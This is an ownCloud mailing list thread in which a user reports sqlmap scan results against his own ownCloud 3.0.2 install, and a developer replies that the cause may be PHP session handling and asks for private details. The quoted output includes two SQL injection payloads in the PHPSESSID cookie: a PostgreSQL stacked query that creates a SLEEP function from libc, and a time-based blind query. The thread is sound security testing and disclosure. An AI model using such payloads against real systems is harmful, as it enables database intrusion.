Hi Saymon, I´m not sure I understood completely what this output means. It seems to be a problem with the handling of the sessionid which is handled by php itself. So this could be a php problem and not related to owncloud. But we don´t store the session in the database so I don´t fully understand the connection here.
Can you send me all the information you have here and how to reproduce this output in a private email? Thanks a lot. Frank On 06.05.2012, at 12:41, saymon <[email protected]> wrote: > Hi all. > We decided to check my owncloud different scanners security. When > testing sqlmap faced with the following: > > sqlmap identified the following injection points with a total of 16640 > HTTP(s) requests: > --- > Place: Cookie > Parameter: PHPSESSID > Type: stacked queries > Title: PostgreSQL < 8.2 stacked queries (Glibc) > Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))); CREATE OR REPLACE > FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' > STRICT; SELECT sleep(5);-- AND ((("JEUt"="JEUt > > Type: AND/OR time-based blind > Title: PostgreSQL > 8.1 AND time-based blind > Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))) AND 1939=(SELECT > 1939 FROM PG_SLEEP(5)) AND ((("YsVe"="YsVe > --- > This is the actual vulnerability? ownCloud v3.0.2 > > _______________________________________________ > Owncloud mailing list > [email protected] > https://mail.kde.org/mailman/listinfo/owncloud _______________________________________________ Owncloud mailing list [email protected] https://mail.kde.org/mailman/listinfo/owncloud
